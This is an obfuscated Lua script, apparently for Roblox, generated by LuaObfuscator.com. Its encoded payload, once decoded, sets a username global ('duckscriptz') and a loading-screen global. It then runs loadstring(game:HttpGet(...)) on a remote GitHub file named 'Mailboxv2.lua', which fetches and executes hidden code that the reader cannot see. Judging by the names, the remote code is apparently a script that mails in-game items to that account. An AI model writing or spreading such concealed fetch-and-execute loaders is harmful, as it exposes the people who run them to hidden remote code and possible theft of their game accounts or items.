--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v78=v5(v70,v19);v19=nil;return v78;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -(1638 -(1523 + 114))))))%((3 -1)^(((v33-((2 + 0) -1)) -(v32-1)) + (620 -((1432 -(282 + 595)) + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;else local v72=(570 -((523 -156) + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v72 + v72))>=v72) and (1 + (1065 -(68 + 997)))) or ((1270 -(226 + 1044)) + 0) ;end end local function v21()local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -(0 + 0))) then v35=v1(v16,v18,v18);v18=v18 + (118 -((989 -(892 + 65)) + 85)) ;v34=(2 -1) + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23()local v38=180 -(67 + 113) ;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + ((1004 -(915 + 82)) -4) );v18=v18 + 4 ;v38=1 + 0 ;end if (v38==(3 -2)) then return (v42 * (16778168 -((2270 -1468) + 150))) + (v41 * (176444 -110908)) + (v40 * (464 -208)) + v39 ;end end end local function v24()local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 -0)) then v48=v20(v45,1208 -(1069 + (462 -344)) ,110 -79 );v49=((v20(v45,72 -40 )==1) and  -(2 -1)) or (1 -0) ;v43=1 + 1 + 1 ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1 + 0 + 0 ;end if (v43==(2 + 1)) then if (v48==(791 -(368 + 423))) then if (v47==0) then return v49 * (0 -0) ;else v48=3 -2 ;v46=18 -(10 + 8) ;end elseif (v48==(7874 -5827)) then return ((v47==(442 -(416 + 26))) and (v49 * ((3 -(1057 -(87 + 968)))/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-((15257 -11791) -2443) ) * (v46 + (v47/((3 -1)^(490 -(145 + 293))))) ;end if ((431 -(44 + 386))==v43) then v46=1487 -(998 + 488) ;v47=(v20(v45,1 + 0 + 0 ,17 + 3 ) * ((768 -(745 + (47 -26)))^(804 -(201 + (1984 -(447 + 966)))))) + v44 ;v43=(3120 -1980) -(116 + 1022) ;end end end local function v25(v50)local v51=1817 -(1703 + 114) ;local v52;local v53;while true do if (v51==(701 -(376 + 325))) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=1 -0 ;end if ((2 -1)==v51) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=1 + 1 ;end if (v51==(1267 -(243 + 1022))) then v53={};for v79=2 -(3 -2) , #v52 do v53[v79]=v2(v1(v3(v52,v79,v79)));end v51=17 -(9 + 5) ;end if ((379 -(85 + 291))==v51) then return v6(v53);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0 + 0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==3) then v61=nil;v62=nil;v54=2 + 2 ;end if (v54==2) then local v73=0 + 0 ;while true do if (0~=v73) then else v59=nil;v60=nil;v73=1;end if (v73==1) then v54=1 + 2 ;break;end end end if (v54==(0 + 0)) then v55=1933 -(565 + 1368) ;v56=nil;v54=530 -(406 + 123) ;end if (v54==(1773 -(1749 + 20))) then while true do if (v55~=(1 + 2)) then else v62=nil;while true do local v102=0;while true do if (v102==0) then local v107=1661 -(1477 + 184) ;while true do if (v107~=(1323 -(1249 + 73))) then else v102=1 + 0 ;break;end if (v107~=(1145 -(466 + 679))) then else if (v56==(2 -1)) then local v130=856 -(564 + 292) ;while true do if (0~=v130) then else local v163=0 -0 ;local v164;while true do if (v163==0) then v164=1900 -(106 + 1794) ;while true do if (v164~=(0 -0)) then else local v179=0 -0 ;while true do if (1==v179) then v164=305 -(244 + 60) ;break;end if ((0 + 0)==v179) then v60={v57,v58,nil,v59};v61=v23();v179=2 -1 ;end end end if (v164==1) then v130=1;break;end end break;end end end if (1~=v130) then else v62={};v56=5 -3 ;break;end end end if ((114 -(4 + 110))==v56) then local v131=1001 -(938 + 63) ;while true do if (v131==(0 + 0)) then v57={};v58={};v131=585 -(57 + 527) ;end if (v131~=1) then else v59={};v56=1;break;end end end v107=1;end end end if (v102==(1 + 0)) then if (v56~=2) then else local v108=0;local v109;while true do if (v108~=(1427 -(41 + 1386))) then else v109=103 -(17 + 86) ;while true do if (v109==(1613 -(1565 + 48))) then local v165=0 + 0 ;while true do if (v165==(1 + 0)) then v109=1139 -(782 + 356) ;break;end if (v165~=(267 -(176 + 91))) then else local v178=0 -0 ;while true do if (v178==(0 -0)) then for v181=1,v61 do local v182=0 -0 ;local v183;local v184;local v185;local v186;while true do if (v182~=(5 -3)) then else while true do if (v183==(166 -(122 + 44))) then v184=0 -0 ;v185=nil;v183=3 -2 ;end if (v183==1) then v186=nil;while true do if (v184==1) then if (v185==(1 + 0)) then v186=v21()~=0 ;elseif (v185==(6 -4)) then v186=v24();elseif (v185==(10 -7)) then v186=v25();end v62[v181]=v186;break;end if (v184==0) then v185=v21();v186=nil;v184=1;end end break;end end break;end if (v182~=1) then else v185=nil;v186=nil;v182=2;end if (v182==0) then v183=0 + 0 ;v184=nil;v182=1 + 0 ;end end end v60[5 -2 ]=v21();v178=1;end if (v178==1) then v165=1 -0 ;break;end end end end end if (v109~=1) then else for v171=1 + 0 ,v23() do local v172=0 -0 ;local v173;local v174;local v175;while true do if ((65 -(30 + 35))~=v172) then else v173=0 -0 ;v174=nil;v172=1 + 0 ;end if (v172~=(612 -(602 + 9))) then else v175=nil;while true do if (v173==(1190 -(449 + 740))) then while true do if (v174~=(1257 -(1043 + 214))) then else v175=v21();if (v20(v175,873 -(826 + 46) ,3 -2 )==0) then local v188=0;local v189;local v190;local v191;local v192;while true do if (v188~=(1212 -(323 + 889))) then else v189=0;v190=nil;v188=3 -2 ;end if (v188==(1 + 1)) then while true do if (v189~=(7 -4)) then else if (v20(v191,583 -(361 + 219) ,443 -(382 + 58) )~=(321 -(53 + 267))) then else v192[4]=v62[v192[4]];end v57[v171]=v192;break;end if (v189==(1 + 0)) then v192={v22(),v22(),nil,nil};if (v190==(0 -0)) then local v200=0 + 0 ;local v201;local v202;while true do if (v200==0) then local v204=850 -(20 + 830) ;while true do if (0==v204) then v201=0 + 0 ;v202=nil;v204=2 -1 ;end if (v204==(127 -(116 + 10))) then v200=1 + 0 ;break;end end end if (v200==(1691 -(1121 + 569))) then while true do if ((738 -(542 + 196))==v201) then v202=683 -(483 + 200) ;while true do if (v202~=(0 -0)) then else v192[3]=v22();v192[4]=v22();break;end end break;end end break;end end elseif (v190==(1 + 0)) then v192[2 + 1 ]=v23();elseif (v190==(2 -0)) then v192[768 -(468 + 297) ]=v23() -((1 + 1)^(578 -(334 + 228))) ;elseif (v190~=(7 -4)) then else local v207=0 -0 ;local v208;local v209;while true do if (v207==(2 -1)) then while true do if ((0 -0)~=v208) then else v209=0 -0 ;while true do if (v209~=(0 + 0)) then else v192[3]=v23() -((238 -(141 + 95))^(1567 -(1126 + 425))) ;v192[9 -5 ]=v22();break;end end break;end end break;end if (v207==0) then v208=405 -(118 + 287) ;v209=nil;v207=1;end end end v189=1 + 1 ;end if ((0 -0)~=v189) then else local v195=0 -0 ;while true do if (v195==(1122 -(118 + 1003))) then v189=2 -1 ;break;end if (v195==(377 -(142 + 235))) then v190=v20(v175,2,2 + 1 );v191=v20(v175,167 -(92 + 71) ,3 + 3 );v195=4 -3 ;end end end if (v189==(2 -0)) then local v196=0 + 0 ;local v197;while true do if (v196~=(0 + 0)) then else v197=977 -(553 + 424) ;while true do if (v197==0) then local v206=0 -0 ;while true do if (v206~=(0 + 0)) then else if (v20(v191,1 + 0 ,1)==(1 + 0)) then v192[2 + 0 ]=v62[v192[2]];end if (v20(v191,128 -(55 + 71) ,1 + 1 )==(1 -0)) then v192[3]=v62[v192[1793 -(573 + 1217) ]];end v206=1;end if (v206~=1) then else v197=2 -1 ;break;end end end if (v197==1) then v189=2 + 1 ;break;end end break;end end end end break;end if (v188==(1 -0)) then v191=nil;v192=nil;v188=4 -2 ;end end end break;end end break;end if (v173~=(0 -0)) then else local v187=0 -0 ;while true do if (v187==(1 + 0)) then v173=4 -3 ;break;end if (v187==(753 -(239 + 514))) then v174=0 + 0 ;v175=nil;v187=1;end end end end break;end end end v56=3;break;end end break;end end end if (v56==(1332 -(797 + 532))) then local v110=0;while true do if (v110~=(0 + 0)) then else local v132=0 + 0 ;while true do if (v132==0) then for v176=2 -1 ,v23() do v58[v176-(1203 -(373 + 829)) ]=v28();end return v60;end end end end end break;end end end break;end if (v55~=(732 -(476 + 255))) then else v58=nil;v59=nil;v55=6 -4 ;end if (v55==(1130 -(369 + 761))) then local v98=0 + 0 ;local v99;while true do if (v98==(0 -0)) then v99=0 -0 ;while true do if (v99==(239 -(64 + 174))) then v55=1;break;end if (v99==(0 + 0)) then v56=0 -0 ;v57=nil;v99=1;end end break;end end end if (v55==(4 -2)) then local v100=336 -(144 + 192) ;local v101;while true do if (v100~=(216 -(42 + 174))) then else v101=0 -0 ;while true do if ((1 + 0)==v101) then v55=3 + 0 ;break;end if (v101~=(0 + 0)) then else local v111=1504 -(363 + 1141) ;while true do if (v111==(1581 -(1183 + 397))) then v101=1;break;end if (v111==0) then v60=nil;v61=nil;v111=2 -1 ;end end end end break;end end end end break;end if (v54==1) then local v74=0 -0 ;while true do if (v74~=(1061 -(810 + 251))) then else v57=nil;v58=nil;v74=1 + 0 ;end if (v74~=1) then else v54=2;break;end end end end end local function v29(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end if (v66==1) then v69=v63[3];return function(...)local v81=v67;local v82=v68;local v83=v69;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94==0) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]]();end elseif (v94<=2) then v91[v93[2]]=v93[3];elseif (v94>3) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else local v134=0;local v135;local v136;while true do if (v134==0) then v135=v93[2];v136=v91[v93[3]];v134=1;end if (v134==1) then v91[v135 + 1 ]=v136;v91[v135]=v136[v93[4]];break;end end end elseif (v94<=6) then if (v94==5) then local v114=v93[2];v91[v114]=v91[v114](v13(v91,v114 + 1 ,v86));else v91[v93[2]]();end elseif (v94<=7) then do return;end elseif (v94>8) then v65[v93[3]]=v91[v93[2]];else local v139=v93[2];local v140=v91[v93[3]];v91[v139 + 1 ]=v140;v91[v139]=v140[v93[4]];end elseif (v94<=14) then if (v94<=11) then if (v94>10) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v65;else v91[v93[2]]=v65[v93[3]];end else v91[v93[2]]=v93[3];end elseif (v94<=12) then local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==1) then v86=(v121 + v119) -1 ;v122=0;v118=2;end if (v118==2) then for v154=v119,v86 do v122=v122 + 1 ;v91[v154]=v120[v122];end break;end if (v118==0) then v119=v93[2];v120,v121=v84(v91[v119](v13(v91,v119 + 1 ,v93[3])));v118=1;end end elseif (v94>13) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v65;else v91[v93[2]]=v65[v93[3]];end else local v147=v93[2];v91[v147]=v91[v147](v13(v91,v147 + 1 ,v86));end elseif (v94<=16) then if (v94==15) then v65[v93[3]]=v91[v93[2]];else local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==2) then for v160=v126,v86 do v129=v129 + 1 ;v91[v160]=v127[v129];end break;end if (v125==1) then v86=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v93[2];v127,v128=v84(v91[v126](v13(v91,v126 + 1 ,v93[3])));v125=1;end end end elseif (v94<=17) then do return;end elseif (v94>18) then v85=v93[3];else v85=v93[3];end v85=v85 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O73616765030D3O004455434B2058204F4E20544F50030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B646D3036332F4475636B783036332F6D61696E2F4D61696C626F7876322E6C756103083O00557365726E616D65030B3O006475636B7363726970747A030F3O00475F4C6F6164696E675363722O656E03063O004455434B205800163O00120A3O00013O00264O000D000100020004123O000D000100120A000100043O00120F000100033O00120B000100053O00120B000200063O00200800020002000700120A000400084O000C000200044O000500013O00022O00010001000100010004123O0015000100264O0001000100010004123O0001000100120A0001000A3O00120F000100093O00120A0001000C3O00120F0001000B3O00120A3O00023O0004123O000100012O00113O00017O00",v9(),...);
